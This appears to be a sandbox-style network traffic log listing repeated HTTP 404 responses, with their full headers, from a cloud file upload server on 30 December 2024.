                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5RCiyPMaMzavAamcUft9MCW-KI4ZETOt5ropsbKbCf182OAPpnQN_YY20iJOSWthWPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZowehwDqIlYydXAu6qBQpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5okGxFREaT6ZPUYMV9qPk8_PCDJN4lf4DY_I_R6ucJbQOTUKlj3injSsoz_b_r7N_iContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:59 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Y0CATLPTPK7zt0ItZBT6Zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4wiqKQje4BzEavScumSqplDEqsP6uyuzcZaqjWSkqrPVtF-KRG7VgrbZGKI4B-I-EZ0pntdoYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:59 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-mTBbfoAUgX3YTEmDAEPVeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC57dVlCIDzrM2kBaXY_GDi48kVXiQU_IBot8gX9vAMfN25Lt6di0DgqmDw9MZAzztIAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:02 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-GxNPbl-ZptBkQ2UG2lyIgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5TNlbQlTQGJnpnAKRbLMUAo3coR3n43cJXYB-lYRvGGmAQLzzN_owBWtY8bzjr_E6dPAC8F6sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:02 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-y0SXmOJlTBj08aZ5_CMAsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6wzXVXwz2KpGZ5bPFI9YMQ509nQ1hCH4a1rPBhD7mzO8LIaXs2DoM1fQ5ebogQ2Nom2R-bFuEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:03 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-bS44W-7-w6KhcSDpllXlWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6x6ZQzbZrZK1KoLfN9VenQHvuOdHzXFxMmxSYrW64yvtKAGq9kbHnMyLTOpNTYMCnLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:03 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-kHwVqm39TMd5PaUdDKuEPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4HveScrGQvZ9A46f9nIEtIn7mEqqAxcAA0OJbD_WiePd-fgw3gmK0slQmR0A5dpjfIlbHYsJ4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:05 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-DSoYPso8ZbqcYTN8X8zXbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC58MhRpl1WIeHxoCZ07h1U1lGW3n1fuUDE9PxkrEYFlx1XsQMuhReXo23X3Qhy4Sur0EDzD7CkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:05 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-NxN_sPizaoapPDNzTXIVbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5NIeBdR99JSotSvr43nBh8dx1xDDBKz8cHvSaFvhSVMPMAb0tlcGHx10apDpTiwzHwKutqPEcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:06 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-7q4uKMSWcH0F03o-6uqvsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5zcP4so15IcblYsaG6lFJ8DMXXgcvN0ZVmFSjlmilfFCUUA__sBGXSwEv92c2FY2gQijVvF4sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:06 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-rABGRj1NhmYmb4wrCaYoNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5CLw1b2MVWrzp2LNqj_2CqhfIV1kPMycOIezyL9Oqa8NcFjPifcEUWSG5s6MKfv_yb-g8Lt38Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:07 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UmSY-HWifLRirVbPsc2Zrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC44l7j1QTLG9HEjcBZFgK--OGhkzHMfFFfnJKL5gZ5mqw94Ohy4uMb3aAUcSJQiOLRCUVjCAAoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:07 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BR_VXPI5PAAeVbJ1uhjE4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4zaup5lYjfZLFGdfvcws7r_DOPjG2KUB68TyCLzuwuNFy0OAHmbglVmkzlmYkgLma7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:09 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2LRXY285QgebXGQxshmsxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7MKCnqlmaq1vjDDiYWKhwaOF5iUG6uAlSPehySEiyIdno4gUWt5ywD7ELKquSWDLjCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:09 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ARH_IWWoUj2ptg8530Q0CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4IEqY2znRpzgj8D4fq9JwOa0xhkinIxm5_QoUvdXq5OT2R0mEgpUiBr9TAclwPQEJWG74u6TYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:10 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-bZFsggUWw4eQusfKzcXwlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5bdDfi8Cu6vX1ADPCUcWB9jFIP6xt1vY2zH900hg5aubSbyI0TwLrlpSdNseHN-NtgYAj3UFcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:10 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Z3XEUzOpE7Zw44K1SwTTqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5g2662M8S-5_AgKLhzvan21rF7FoyB42VtEAxAAlczW9F23Fbq7mPKb5Ua76O3XU4ZQkp23ScContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:11 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-U09BsOogBLcpRqgLHAkElg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5cTKslsqk05o5C9_SZ5WMOTxie7D6UwX4Lxb0QYgDBLWbpRhLvIvubXz9XjHz_j64RContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:11 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8EsjCqfg3hkjXOQwERil9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7BBPiZR2cZompsAFYNQCw7iezaoMB1wTsk66b-l2QjY40Apvvsq0M2P7cJQWMlzcRsUKkjoQMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:12 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-r2j1SvHqjeAWsfuET4UKfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
